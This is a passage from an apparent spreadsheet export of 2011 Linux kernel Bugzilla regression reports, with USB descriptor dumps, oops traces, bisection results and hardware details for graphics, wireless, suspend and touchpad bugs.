Item(Global): Report Count, data= [ 0x05 ] 5 Item(Global): Report Size, data= [ 0x01 ] 1 Item(Main ): Input, data= [ 0x02 ] 2 Data Variable Absolute No_Wrap Linear Preferred_State No_Null_Position Non_Volatile Bitfield Item(Global): Report Count, data= [ 0x01 ] 1 Item(Global): Report Size, data= [ 0x03 ] 3 Item(Main ): Input, data= [ 0x01 ] 1 Constant Array Absolute No_Wrap Linear Preferred_State No_Null_Position Non_Volatile Bitfield Item(Global): Usage Page, data= [ 0x01 ] 1 Generic Desktop Controls Item(Local ): Usage, data= [ 0x30 ] 48 Direction-X Item(Local ): Usage, data= [ 0x31 ] 49 Direction-Y Item(Local ): Usage, data= [ 0x38 ] 56 Wheel Item(Global): Logical Minimum, data= [ 0x81 ] 129 Item(Global): Logical Maximum, data= [ 0x7f ] 127 Item(Global): Report Size, data= [ 0x08 ] 8 Item(Global): Report Count, data= [ 0x03 ] 3 Item(Main ): Input, data= [ 0x06 ] 6 Data Variable Relative No_Wrap Linear Preferred_State No_Null_Position Non_Volatile Bitfield Item(Main ): End Collection, data=none Item(Main ): End Collection, data=none Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x82 EP 2 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0008 1x 8 bytes bInterval 10 Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 2 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 3 Human Interface Device bInterfaceSubClass 0 No Subclass bInterfaceProtocol 0 None iInterface 0 HID Device Descriptor: bLength 9 bDescriptorType 33 bcdHID 1.10 bCountryCode 0 Not supported bNumDescriptors 1 bDescriptorType 34 Report wDescriptorLength 54 Report Descriptor: (length is 54) Item(Global): Usage Page, data= [ 0x0c ] 12 Consumer Item(Local ): Usage, data= [ 0x01 ] 1 Consumer Control Item(Main ): Collection, data= [ 0x01 ] 1 Application Item(Global): Report ID, data= [ 0x01 ] 1 Item(Global): Report Size, data= [ 0x10 ] 16 Item(Global): Report Count, data= [ 0x01 ] 1 Item(Global): Logical Minimum, data= [ 0x01 ] 1 Item(Global): Logical Maximum, data= [ 0x8c 0x02 ] 652 Item(Local ): Usage Minimum, data= [ 0x01 ] 1 Consumer Control Item(Local ): Usage Maximum, data= [ 0x8c 0x02 ] 652 (null) Item(Main ): Input, data= [ 0x60 ] 96 Data Array Absolute No_Wrap Linear No_Preferred_State Null_State Non_Volatile Bitfield Item(Main ): End Collection, data=none Item(Global): Usage Page, data= [ 0x01 ] 1 Generic Desktop Controls Item(Local ): Usage, data= [ 0x80 ] 128 System Control Item(Main ): Collection, data= [ 0x01 ] 1 Application Item(Global): Report ID, data= [ 0x02 ] 2 Item(Global): Report Size, data= [ 0x02 ] 2 Item(Global): Report Count, data= [ 0x01 ] 1 Item(Global): Logical Minimum, data= [ 0x01 ] 1 Item(Global): Logical Maximum, data= [ 0x03 ] 3 Item(Local ): Usage, data= [ 0x82 ] 130 System Sleep Item(Local ): Usage, data= [ 0x81 ] 129 System Power Down Item(Local ): Usage, data= [ 0x83 ] 131 System Wake Up Item(Main ): Input, data= [ 0x60 ] 96 Data Array Absolute No_Wrap Linear No_Preferred_State Null_State Non_Volatile Bitfield Item(Global): Report Size, data= [ 0x0e ] 14 Item(Main ): Input, data= [ 0x03 ] 3 Constant Variable Absolute No_Wrap Linear Preferred_State No_Null_Position Non_Volatile Bitfield Item(Main ): End Collection, data=none Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x83 EP 3 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0008 1x 8 bytes bInterval 10 Device Status: 0x0002 (Bus Powered) Remote Wakeup Enabled</t>
  </si>
  <si>
    <t>radeon: screen distortion on resume</t>
  </si>
  <si>
    <t>2011-01-17 13:23 UTC</t>
  </si>
  <si>
    <t>Brett Witherspoon</t>
  </si>
  <si>
    <t>2011-02-12 23:19 UTC</t>
  </si>
  <si>
    <t>With v2.6.37, the radeon KMS drivers, and my RV730 I get a distorted screen when resuming from suspend to ram. This does not occur with v2.6.36 and I have bisected to this commit: ----------------------------------------------------------------------------- From ba032a58d1f320039e7850fb6e8651695c1aa571 Mon Sep 17 00:00:00 2001 From: Alex Deucher &lt;alexdeucher@gmail.com&gt; Date: Mon, 4 Oct 2010 17:13:01 -0400 Subject: [PATCH] drm/radeon/kms: rework spread spectrum handling This patch reworks spread spectrum handling to enable it properly on lvds and DP/eDP links. It also fixes several bugs in the old spread spectrum code. ----------------------------------------------------------------------------- lspci -v ----------------------------------------------------------------------------- 03:00.0 VGA compatible controller: ATI Technologies Inc RV730 PRO [Radeon HD 4650] (prog-if 00 [VGA controller]) Subsystem: PC Partner Limited Device 9498 Flags: bus master, fast devsel, latency 0, IRQ 40 Memory at e0000000 (64-bit, prefetchable) [size=256M] Memory at fb9e0000 (64-bit, non-prefetchable) [size=64K] I/O ports at ee00 [size=256] [virtual] Expansion ROM at fb900000 [disabled] [size=128K] Capabilities: [50] Power Management version 3 Capabilities: [58] Express Legacy Endpoint, MSI 00 Capabilities: [a0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Capabilities: [100] Vendor Specific Information: ID=0001 Rev=1 Len=010 &lt;?&gt; Kernel driver in use: radeon 03:00.1 Audio device: ATI Technologies Inc RV710/730 Subsystem: PC Partner Limited R700 Audio Device [Radeon HD 4000 Series] Flags: bus master, fast devsel, latency 0, IRQ 44 Memory at fb9fc000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 3 Capabilities: [58] Express Legacy Endpoint, MSI 00 Capabilities: [a0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Capabilities: [100] Vendor Specific Information: ID=0001 Rev=1 Len=010 &lt;?&gt; Kernel driver in use: HDA Intel ----------------------------------------------------------------------------- Let me know what else I can provide.</t>
  </si>
  <si>
    <t>SNB/ILK: Resume from S3 in external-only monitor mode (VGA) broken</t>
  </si>
  <si>
    <t>2011-01-17 16:11 UTC</t>
  </si>
  <si>
    <t>Stefan Dirsch</t>
  </si>
  <si>
    <t>2011-02-19 23:49 UTC</t>
  </si>
  <si>
    <t>After suspending (S3) in external-only monitor mode (VGA), resuming doesn't work properly. Both monitors show the Linux console (apparently a fake) with the mouse cursor on the external monitor. After switching to real Linux console and back to X you're back in external-only monitor mode. "powersave -u" (SUSE:SLE-11-SP1) is used for suspend (S3). Mesa 7.10 libdrm 2.4.23 + git 0184bb1c xf86-video-intel 2.14.0</t>
  </si>
  <si>
    <t>HVR-1300 tuning problems (MythTV, Kaffeine)</t>
  </si>
  <si>
    <t>2.6.35.9-64.fc14.x86_64</t>
  </si>
  <si>
    <t>2011-01-17 17:55 UTC</t>
  </si>
  <si>
    <t>2012-09-30 09:15 UTC</t>
  </si>
  <si>
    <t>I have a Hauppauge HVR-1300 card, and it does not work in MyhtTV at all (cannot find any channel), and in Kaffeine it displays a single channel, but when trying to switch to a different channel, Kaffeine locks up. After restarting Kaffeine, it displays the newly selected channel, and works until somebody tries to switch to a different channel again. Tuning using tzap works (it takes about two seconds to obtain a lock): $ tzap CT\ 1 using '/dev/dvb/adapter0/frontend0' and '/dev/dvb/adapter0/demux0' tuning to 538000000 Hz video pid 0x0101, audio pid 0x0111 status 01 | signal 6767 | snr 8000 | ber 00003fff | unc 00000000 | status 1f | signal 6767 | snr ffff | ber 00000000 | unc 00000000 | FE_HAS_LOCK status 1f | signal 6767 | snr ffff | ber 00000000 | unc 00000000 | FE_HAS_LOCK When tuned using tzap, the DVB-T stream can be displayed e.g. using mplayer or saved using cat. I have reported this to the MythTV trac, but the authors claimed this to be a driver bug, and suggested filling a kernel bug entry, which is what I am doing now. The MythTV request is at http://code.mythtv.org/trac/ticket/8074. Both MythTV and Kaffeine problems have also been seen by another user here: http://godard.b.free.fr/dotclear/index.php?2007/04/04/13-hauppauge-wintv-hvr1300-under-linux#c1346 I use mainly Fedora kernel, but occasionally try also kernel.org vanilla kernels, so this is by no means specific to the Fedora kernel.</t>
  </si>
  <si>
    <t>i915 kernel oops after error "*ERROR* fixme: max PWM is zero."</t>
  </si>
  <si>
    <t>2011-01-18 09:34 UTC</t>
  </si>
  <si>
    <t>Pauli Borodulin</t>
  </si>
  <si>
    <t>2012-03-31 21:52 UTC</t>
  </si>
  <si>
    <t>I get kernel oops during boot after upgrading from vanilla 2.6.36.2 to vanilla 2.6.37. The problem seems to be in the i915 driver, which prints error "*ERROR* fixme: max PWM is zero." just before kernel oopses. Older kernel 2.6.26.2 did not print this error -- instead, it printed errors: [drm:init_ring_common] *ERROR* render ring head not reset to zero ctl 00000000 head 02001000 tail 00000000 start 02001000 [drm:init_ring_common] *ERROR* render ring head forced to zero ctl 00000000 head 00000000 tail 00000000 start 02001000 These errors did not seem to have any functional ill effects. Here is the kernel 2.6.37 output during boot: [drm:intel_panel_get_max_backlight] *ERROR* fixme: max PWM is zero. BUG: unable to handle kernel paging request at ff400000 IP: [&lt;ff400000&gt;] 0xff400000 *pde = 00000000 Oops: 0000 [#1] SMP last sysfs file: Pid: 1, comm: swapper Not tainted 2.6.37-hpt5745 #1 3641h/hp t5745 EIP: 0060:[&lt;ff400000&gt;] EFLAGS: 00010286 CPU: 0 EIP is at 0xff400000 EAX: ff400000 EBX: f609c000 ECX: 00000000 EDX: f609c000 ESI: 00000000 EDI: 3c000000 EBP: f68cf400 ESP: f6859e9c DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 Process swapper (pid: 1, ti=f6858000 task=f6857bc0 task.ti=f6858000) Stack: c05bff9d 00000000 10000000 01fff000 f609c000 00000048 f609c000 00000000 c05b2cf4 f609c000 00000000 c06f57f4 f609d0a8 00000008 f68cf630 f68cf400 fed10001 0000016b f68cf400 c06f6450 f69b5800 c07d2080 c05b4629 f68cf630 Call Trace: [&lt;c05bff9d&gt;] ? i915_driver_load+0xd27/0xd9d [&lt;c05b2cf4&gt;] ? drm_get_minor+0x17e/0x1e1 [&lt;c05b4629&gt;] ? drm_get_pci_dev+0x121/0x1f5 [&lt;c05f6c4a&gt;] ? __driver_attach+0x0/0x5b [&lt;c054dd11&gt;] ? local_pci_probe+0xb/0xc [&lt;c054de66&gt;] ? pci_device_probe+0x41/0x65 [&lt;c05f6abe&gt;] ? driver_probe_device+0x93/0x10b [&lt;c05f6c8a&gt;] ? __driver_attach+0x40/0x5b [&lt;c05f6129&gt;] ? bus_for_each_dev+0x37/0x58 [&lt;c05f696d&gt;] ? driver_attach+0x11/0x13 [&lt;c05f6c4a&gt;] ? __driver_attach+0x0/0x5b [&lt;c05f6691&gt;] ? bus_add_driver+0x98/0x1c2 [&lt;c053a72d&gt;] ? kset_find_obj_hinted+0x56/0x85 [&lt;c0802b76&gt;] ? i915_init+0x0/0x94 [&lt;c05f6e23&gt;] ? driver_register+0x77/0xcb [&lt;c0802b76&gt;] ? i915_init+0x0/0x94 [&lt;c054e057&gt;] ? __pci_register_driver+0x32/0x7c [&lt;c07e4252&gt;] ? do_one_initcall+0x68/0x106 [&lt;c07e462e&gt;] ? kernel_init+0x105/0x18b [&lt;c07e4529&gt;] ? kernel_init+0x0/0x18b [&lt;c0402a36&gt;] ? kernel_thread_helper+0x6/0x12 Code: Bad EIP value. EIP: [&lt;ff400000&gt;] 0xff400000 SS:ESP 0068:f6859e9c CR2: 00000000ff400000 ---[ end trace 7cf819c169720edf ]--- Kernel panic - not syncing: Attempted to kill init! Pid: 1, comm: swapper Tainted: G D 2.6.37-hpt5745 #1 Call Trace: [&lt;c04269a5&gt;] ? panic+0x53/0x133 [&lt;c0428f42&gt;] ? do_exit+0x54/0x57a [&lt;c0404c10&gt;] ? oops_end+0x8f/0x93 [&lt;c0418def&gt;] ? no_context+0x10d/0x116 [&lt;c0418ff4&gt;] ? bad_area_nosemaphore+0xa/0xc [&lt;c04192e3&gt;] ? do_page_fault+0x157/0x34c [&lt;c043344c&gt;] ? call_usermodehelper_exec+0x5b/0x65 [&lt;c053b2ed&gt;] ? kobject_uevent_env+0x385/0x3a9 [&lt;c041918c&gt;] ? do_page_fault+0x0/0x34c [&lt;c06bbe62&gt;] ? error_code+0x5a/0x60 [&lt;c05f007b&gt;] ? uart_open+0x54/0x130 [&lt;c041918c&gt;] ? do_page_fault+0x0/0x34c [&lt;c05bff9d&gt;] ? i915_driver_load+0xd27/0xd9d [&lt;c05b2cf4&gt;] ? drm_get_minor+0x17e/0x1e1 [&lt;c05b4629&gt;] ? drm_get_pci_dev+0x121/0x1f5 [&lt;c05f6c4a&gt;] ? __driver_attach+0x0/0x5b [&lt;c054dd11&gt;] ? local_pci_probe+0xb/0xc [&lt;c054de66&gt;] ? pci_device_probe+0x41/0x65 [&lt;c05f6abe&gt;] ? driver_probe_device+0x93/0x10b [&lt;c05f6c8a&gt;] ? __driver_attach+0x40/0x5b [&lt;c05f6129&gt;] ? bus_for_each_dev+0x37/0x58 [&lt;c05f696d&gt;] ? driver_attach+0x11/0x13 [&lt;c05f6c4a&gt;] ? __driver_attach+0x0/0x5b [&lt;c05f6691&gt;] ? bus_add_driver+0x98/0x1c2 [&lt;c053a72d&gt;] ? kset_find_obj_hinted+0x56/0x85 [&lt;c0802b76&gt;] ? i915_init+0x0/0x94 [&lt;c05f6e23&gt;] ? driver_register+0x77/0xcb [&lt;c0802b76&gt;] ? i915_init+0x0/0x94 [&lt;c054e057&gt;] ? __pci_register_driver+0x32/0x7c [&lt;c07e4252&gt;] ? do_one_initcall+0x68/0x106 [&lt;c07e462e&gt;] ? kernel_init+0x105/0x18b [&lt;c07e4529&gt;] ? kernel_init+0x0/0x18b [&lt;c0402a36&gt;] ? kernel_thread_helper+0x6/0x12 panic occurred, switching back to text console The hardware in question is HP T5745 thin-client. Here's the lspci -v output: 00:00.0 Host bridge: Intel Corporation Mobile 4 Series Chipset Memory Controller Hub (rev 09) 00:02.0 VGA compatible controller: Intel Corporation Mobile 4 Series Chipset Integrated Graphics Controller (rev 09) 00:02.1 Display controller: Intel Corporation Mobile 4 Series Chipset Integrated Graphics Controller (rev 09) 00:1a.0 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #4 (rev 03) 00:1a.1 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #5 (rev 03) 00:1a.2 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #6 (rev 03) 00:1a.7 USB Controller: Intel Corporation 82801I (ICH9 Family) USB2 EHCI Controller #2 (rev 03) 00:1b.0 Audio device: Intel Corporation 82801I (ICH9 Family) HD Audio Controller (rev 03) 00:1c.0 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 1 (rev 03) 00:1c.4 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 5 (rev 03) 00:1c.5 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 6 (rev 03) 00:1d.0 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #1 (rev 03) 00:1d.1 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #2 (rev 03) 00:1d.2 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #3 (rev 03) 00:1d.7 USB Controller: Intel Corporation 82801I (ICH9 Family) USB2 EHCI Controller #1 (rev 03) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev 93) 00:1f.0 ISA bridge: Intel Corporation ICH9M LPC Interface Controller (rev 03) 00:1f.2 IDE interface: Intel Corporation ICH9M/M-E 2 port SATA IDE Controller (rev 03) 00:1f.3 SMBus: Intel Corporation 82801I (ICH9 Family) SMBus Controller (rev 03) 00:1f.5 IDE interface: Intel Corporation ICH9M/M-E 2 port SATA IDE Controller (rev 03) 04:00.0 Ethernet controller: Broadcom Corporation NetLink BCM57780 Gigabit Ethernet PCIe (rev 01) And here's xrandr output using the older kernel 2.6.36.2: Screen 0: minimum 320 x 200, current 1280 x 1024, maximum 8192 x 8192 VGA1 connected 1280x1024+0+0 (normal left inverted right x axis y axis) 338mm x 270mm 1280x1024 60.0*+ 75.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 HDMI1 disconnected (normal left inverted right x axis y axis) DP1 disconnected (normal left inverted right x axis y axis) TV1 disconnected (normal left inverted right x axis y axis)</t>
  </si>
  <si>
    <t>[REPORT] BUG: spinlock recursion on CPU#0, init/1</t>
  </si>
  <si>
    <t>2.6.38-rc1</t>
  </si>
  <si>
    <t>2011-01-18 16:17 UTC</t>
  </si>
  <si>
    <t>2011-03-27 08:58 UTC</t>
  </si>
  <si>
    <t>Subject : [REPORT] BUG: spinlock recursion on CPU#0, init/1 Submitter : Santosh Shilimkar &lt;santosh.shilimkar@ti.com&gt; Date : 2011-01-10 15:33 Message-ID : a7a9bdaa5936630925fb7ffd1a1795b1@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=129467294808655&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG: spinlock recursion (sys_chdir, user_path_at, do_path_lookup ...)</t>
  </si>
  <si>
    <t>2011-01-18 16:58 UTC</t>
  </si>
  <si>
    <t>2011-01-29 14:32 UTC</t>
  </si>
  <si>
    <t>Subject : BUG: spinlock recursion (sys_chdir, user_path_at, do_path_lookup ...) Submitter : "Uwe Kleine-König" &lt;u.kleine-koenig@pengutronix.de&gt; Date : 2011-01-11 11:05 Message-ID : 20110111110539.GP24920@pengutronix.de References : http://marc.info/?l=linux-kernel&amp;m=129474395831549&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Kernel panic on highly loaded webserver in task_rq_lock</t>
  </si>
  <si>
    <t>2.6.36.3</t>
  </si>
  <si>
    <t>2011-01-20 12:26 UTC</t>
  </si>
  <si>
    <t>Yuriy Yevtukhov</t>
  </si>
  <si>
    <t>Created attachment 44442 [details] Screenshot We have about 50 webservers. Most of them have kernel 2.6.32.23 (custom). As support for new hardware will be necessary on new servers we have to use more recent kernel on them. Trying 2.6.36.1 gave kernel panic after about a day of load (the same picture as in attachment for 2.6.36.3). I waited for patches and tryed 2.6.36.3 (as I didn't find anything related to this bug in 2.6.36.2 changelist) - result is the same. After couple of days we got kernel panic. I have nothing more except for screenshot made from KVM and kernel config. It seam that problem is inside scheduler or VFS, both were updated for 2.6.36. Picture and config in attachments.</t>
  </si>
  <si>
    <t>After resume of S4 overlay stays active on Pineview</t>
  </si>
  <si>
    <t>2011-01-21 14:30 UTC</t>
  </si>
  <si>
    <t>Matthias Hopf</t>
  </si>
  <si>
    <t>2011-02-19 23:57 UTC</t>
  </si>
  <si>
    <t>Created attachment 44602 [details] Patch fixing this regression Git commit 032d2a0 "drm/i915: Prevent double dpms on" results in a weird regression on intel Pineview (8086:a011) - after resume from S4 the previous framebuffer contents (in resolution 800x600) are displayed in a sort-of overlay in the upper left part of the screen, only vanishing after an S3 cycle. Interestingly, the regular XV overlay seems to be a different overlay, because using the XV overlay (the second XVideo adapter) doesn't change the display. Patch from Takashi attached.</t>
  </si>
  <si>
    <t>Only the first suspend to RAM works</t>
  </si>
  <si>
    <t>2011-01-22 22:44 UTC</t>
  </si>
  <si>
    <t>2011-02-20 00:14 UTC</t>
  </si>
  <si>
    <t>Created attachment 44802 [details] config of an affected 2.6.37 kernel If I boot my ThinkPad R50e with a fairly stock kernel (vanilla 2.6.37 with Debian config) with break=top (to get a prompt in the early initramfs phase, before any modules are loaded), I can successfully suspend to RAM via "echo mem &gt;/sys/power/state", but only once. Further tries don't power off the machine but resume instantly and give the prompt back without any error indication. If (after a reboot) I "echo core &gt;/sys/power/pm_test", then any number of "echo mem &gt;/sys/power/state" commands wait 5 seconds before resuming. If I then "echo none &gt;/sys/power/pm_test; echo mem &gt;/sys/power/state", then the machine suspends all right once, but repeated "echo mem &gt;/sys/power/state" commands again fail to put the machine into low power state (S3). The same happens under 2.6.36 as well, but 2.6.32 seems to work OK on repeated suspends. I can try to narrow it down unless some better idea surfaces.</t>
  </si>
  <si>
    <t>ath5k phy0: gain calibration timeout</t>
  </si>
  <si>
    <t>2011-01-23 00:18 UTC</t>
  </si>
  <si>
    <t>2012-06-20 19:33 UTC</t>
  </si>
  <si>
    <t>Hi, When trying 2.6.38-rc1 or -rc2, I get the following error, that I didn't get with 2.6.37 or any earlier kernel. Jan 22 15:04:00 miniko kernel: [ 7.570574] ath5k 0000:03:00.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 Jan 22 15:04:00 miniko kernel: [ 7.570590] ath5k 0000:03:00.0: setting latency timer to 64 Jan 22 15:04:00 miniko kernel: [ 7.570655] ath5k 0000:03:00.0: registered as 'phy0' Jan 22 15:04:00 miniko kernel: [ 8.158475] ath: EEPROM regdomain: 0x62 Jan 22 15:04:00 miniko kernel: [ 8.158479] ath: EEPROM indicates we should expect a direct regpair map Jan 22 15:04:00 miniko kernel: [ 8.158483] ath: Country alpha2 being used: 00 Jan 22 15:04:00 miniko kernel: [ 8.158486] ath: Regpair used: 0x62 Jan 22 15:04:00 miniko kernel: [ 8.324652] Registered led device: ath5k-phy0::rx Jan 22 15:04:00 miniko kernel: [ 8.324683] Registered led device: ath5k-phy0::tx Jan 22 15:04:00 miniko kernel: [ 8.324697] ath5k phy0: Atheros AR5414 chip found (MAC: 0xa3, PHY: 0x61) Jan 22 15:04:00 miniko kernel: [ 8.348678] udev[361]: renamed network interface wlan0 to ath27 Jan 22 15:04:00 miniko kernel: [ 33.931257] ADDRCONF(NETDEV_UP): ath27: link is not ready Jan 22 15:04:55 miniko kernel: [ 99.732997] ath27: authenticate with 00:21:29:96:13:54 (try 1) Jan 22 15:04:55 miniko kernel: [ 99.734467] ath27: authenticated Jan 22 15:04:55 miniko kernel: [ 99.734539] ath27: associate with 00:21:29:96:13:54 (try 1) Jan 22 15:04:55 miniko kernel: [ 99.738091] ath27: RX AssocResp from 00:21:29:96:13:54 (capab=0x411 status=0 aid=2) Jan 22 15:04:55 miniko kernel: [ 99.738099] ath27: associated Jan 22 15:04:55 miniko kernel: [ 99.739412] ADDRCONF(NETDEV_CHANGE): ath27: link becomes ready Jan 22 15:05:06 miniko kernel: [ 110.552106] ath27: no IPv6 routers present Jan 22 15:05:25 miniko kernel: [ 129.710184] ath5k phy0: gain calibration timeout (2457MHz) Jan 22 15:05:26 miniko kernel: [ 130.232708] ath5k phy0: gain calibration timeout (2412MHz) Jan 22 15:05:27 miniko kernel: [ 131.095475] ath5k phy0: gain calibration timeout (2462MHz) Jan 22 15:05:28 miniko kernel: [ 131.606793] ath5k phy0: gain calibration timeout (2412MHz) Jan 22 15:05:28 miniko kernel: [ 132.353525] ath5k phy0: gain calibration timeout (2467MHz) Jan 22 15:05:28 miniko kernel: [ 132.847867] ath5k phy0: gain calibration timeout (2412MHz) Jan 22 15:05:29 miniko kernel: [ 133.709779] ath5k phy0: gain calibration timeout (2472MHz) Jan 22 15:05:30 miniko kernel: [ 134.225298] ath5k phy0: gain calibration timeout (2412MHz) Jan 22 15:05:31 miniko kernel: [ 134.973809] ath5k phy0: gain calibration timeout (2484MHz) Jan 22 15:05:31 miniko kernel: [ 135.450323] ath5k phy0: gain calibration timeout (2412MHz) Jan 22 15:05:32 miniko kernel: [ 136.375769] ath5k phy0: gain calibration timeout (5180MHz) Jan 22 15:05:33 miniko kernel: [ 136.954239] ath5k phy0: gain calibration timeout (2412MHz) This error messages goes on and on and ultimately, GNOME network-manager disconnects from the wireless network. After reboot, even when I switch back to an earlier kernel, the error message persists. And it's only if I stop the machine and start it again that the error disappears. Let me know if I can provide more information.</t>
  </si>
  <si>
    <t>Atheros adapter no longer loads firmware</t>
  </si>
  <si>
    <t>≥2.6.37-rc6</t>
  </si>
  <si>
    <t>2011-01-23 15:29 UTC</t>
  </si>
  <si>
    <t>Michal Vaner</t>
  </si>
  <si>
    <t>2012-05-09 20:45 UTC</t>
  </si>
  <si>
    <t>Created attachment 44842 [details] dmesg output of an attempt to load firmware. I have a bluetooth USB adapter. There's „ASUS USB-BT211“ printed on it, but it looks like there's an atheros chip inside. It reports itself as „idVendor=0cf3, idProduct=3002“ in dmesg (http://www.asus.com/product.aspx?P_ID=GfCNjYFw5rZAov3S). It stopped working (the device is missing, hcitool dev shows nothing) with an update and I found this in dmesg (complete dmesg from one experiment is attached): [ 104.800127] ehci_hcd 0000:00:13.2: suspend root hub [ 107.756779] usb 3-1: khubd timed out on ep0out len=0/20 [ 107.756782] ath3k_load_firmware: Can't change to loading configuration err [ 107.756790] ath3k: probe of 3-1:1.0 failed with error -5 The „Can't change…“ error message comes from drivers/bluetooth/ath3k.c and it seems it has problems loading firmware into the device (it times out after ~5 seconds). After bisecting, I discovered it is caused by the commit be93112accb42c5586a459683d71975cc70673ca. If I revert this one, it works well with today's version (v2.6.38-rc8). Is it possible that the btusb driver somehow initiated the device so it would accept the firmware from ath3k module and then it got claimed by btusb driver and with the commit it is blacklisted in btusb, therefore not performing the initialization? Is it possible there are two different devices with the same USB ID, so one needs to be blacklisted and one does not? Is there any other info I could provide?</t>
  </si>
  <si>
    <t>Asus N61JQ does not shutdown unless nolapic given</t>
  </si>
  <si>
    <t>2011-01-23 16:51 UTC</t>
  </si>
  <si>
    <t>Asus N61JQ does not shutdown unless nolapic given. I'm attaching relevant informations.</t>
  </si>
  <si>
    <t>NFS OOps  - kernel BUG at fs/nfs/nfs3xdr.c:1338</t>
  </si>
  <si>
    <t>2011-01-23 17:39 UTC</t>
  </si>
  <si>
    <t>2011-01-31 17:38 UTC</t>
  </si>
  <si>
    <t>Subject : NFS OOps - kernel BUG at fs/nfs/nfs3xdr.c:1338 Submitter : Milan Broz &lt;mbroz@redhat.com&gt; Date : 2011-01-14 23:18 Message-ID : 4D30D9D6.2080809@redhat.com References : http://marc.info/?l=linux-kernel&amp;m=129504714503972&amp;w=2 This entry is being used for tracking a regression from 2.6.37. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Samsung NF210 QX310 QX410 QX510 SF310 SF410 SF510 RF410 RF510 RF710 touchpad / trackpad detected as PS/2 Logitech Wheel mouse</t>
  </si>
  <si>
    <t>2011-01-23 18:02 UTC</t>
  </si>
  <si>
    <t>EricDP</t>
  </si>
  <si>
    <t>2012-05-20 20:40 UTC</t>
  </si>
  <si>
    <t>Created attachment 44892 [details] /var/log/dmesg The NF210 comes with a multi-touch touchpad, but it is not properly detected by the kernel driver. As a result, some touchpad functionality (like multi-touch) is not working, and other functionality (like tap-to-click) is not working properly--it is overly sensitive and detects clicks when the pad is slightly grazed by the palm. My specific model is NP-NF210-A01CA, but I believe this is happening on a number of other models too. Ubuntu bug 681904 reports Samsung models QX310/QX410/QX510/SF310/SF410/SF510/NF210/RF510/RF710 are all having the same problem. Ubuntu bug report that might be related: https://bugs.edge.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/681904 Pad is detected as: [38017.372736] psmouse serio1: ID: 10 00 64 [38018.085779] input: PS/2 Logitech Wheel Mouse as /devices/platform/i8042/serio1/input/input8 Tested on both ubuntu and fedora kernels with same issue. The tap-to-click is by far the most annoying. If nothing else can be fixed, just turning that off would make this netbook far more usable. Attached boot dmesg.</t>
  </si>
  <si>
    <t>Backlight control broken on Vaio SZ650</t>
  </si>
  <si>
    <t>2.6.38-rc2</t>
  </si>
  <si>
    <t>2011-01-23 20:26 UTC</t>
  </si>
  <si>
    <t>2011-03-30 21:51 UTC</t>
  </si>
  <si>
    <t>This commit introduces a bug that prevents backlight control from either hotkeys or xbacklight. The video adapter is a Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c). 6d5bbf00d251cc73223a71422d69e069dc2e0b8d is the first bad commit commit 6d5bbf00d251cc73223a71422d69e069dc2e0b8d Author: Len Brown &lt;len.brown@intel.com&gt; Date: Fri Jan 7 01:46:40 2011 +0100 ACPI: Use ioremap_cache() Although the temporary boot-time ACPI table mappings were set up with CPU caching enabled, the permanent table mappings and AML run-time region memory accesses were set up with ioremap(), which on x86 is a synonym for ioremap_nocache(). Changing this to ioremap_cache() improves performance as seen when accessing the tables via acpidump, or /sys/firmware/acpi/tables. It should also improve AML run-time performance. No change on ia64. Reported-by: Jack Steiner &lt;steiner@sgi.com&gt; Signed-off-by: Len Brown &lt;len.brown@intel.com&gt; Signed-off-by: Rafael J. Wysocki &lt;rjw@sisk.pl&gt; :040000 040000 2657fb60f4b7176b4c3599d8723222eef4c6c58d a0aa669cc80f2804ebc73818e8df16d7cc147cdf M arch :040000 040000 a27e58b84f29112d0d2717d71e52fafba08cfdaf 3c51f290a55060d35f04cc1a8768c3b0b5b68b36 M drivers</t>
  </si>
  <si>
    <t>5bd5a45 breaks resume from suspend on Thinkpad X201</t>
  </si>
  <si>
    <t>2.6.38-rc</t>
  </si>
  <si>
    <t>2011-01-23 23:24 UTC</t>
  </si>
  <si>
    <t>Björn Schließmann</t>
  </si>
  <si>
    <t>2011-02-12 22:30 UTC</t>
  </si>
  <si>
    <t>27662 28342</t>
  </si>
  <si>
